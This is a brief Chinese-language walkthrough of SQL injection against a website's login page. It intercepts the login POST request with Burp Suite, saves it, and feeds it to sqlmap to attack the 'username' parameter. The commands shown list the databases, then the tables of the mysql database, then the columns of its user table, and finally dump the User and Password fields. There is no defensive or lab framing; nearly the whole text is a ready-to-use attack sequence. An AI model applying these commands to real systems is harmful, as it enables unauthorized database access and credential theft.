具体流程:
(1)浏览器打开目标地址http:// www.xxx.com /Login.asp
(2)配置burp代理(127.0.0.1:8080)以拦截请求
(3)点击login表单的submit按钮
(4)这时候Burp会拦截到了我们的登录POST请求
(5)把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下
(6)运行sqlmap并执行如下命令:
1、列数据库:
sqlmap -r test.txt -p username –dbs
注:-r表示加载一个文件,-p指定参数
2、选择一个数据库列表名
Sqlmap -r test.txt -p username -D mysql –tables
3、猜列名
Sqlmap -r test.txt -p username -D mysql -T user –columns
4、猜字段名
sqlmap -r test.txt -p username -D mysql -T user -C “User,Password” –dump